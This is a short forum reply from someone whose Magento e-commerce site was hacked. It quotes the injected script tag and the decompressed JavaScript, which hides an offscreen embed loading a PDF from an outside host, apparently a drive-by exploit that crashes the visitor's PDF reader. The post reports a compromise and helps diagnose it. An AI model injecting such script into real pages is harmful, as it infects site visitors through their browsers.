Hacked Site

Out of context: Reply #9

  • Started
  • Last post
  • 11 Responses
  • jackman0

    Same problem with magento (ecommerce CMS), this line have been add :
    <script src=http://rondoniainfoco.com/admin/indexd.php ></script>
    it's writting a compressed javascript code in my page, this is te decompressed code :

    document.write("<div style=\"position:absolute;
    left:-1000px;
    top:-1000px;
    \">");
    document.write('<embed width=100 height=100
    src="http://rondoniainfoco.com/admin/indexd.php?s=WviRDUq8&id=2"
    type="application/pdf"></embed>');
    document.write("</div>");

    So when you open the website, it's trying to start PDF reader but it can't. Error message : "sorry reader can't start it's core DLL's", or something like that.

View thread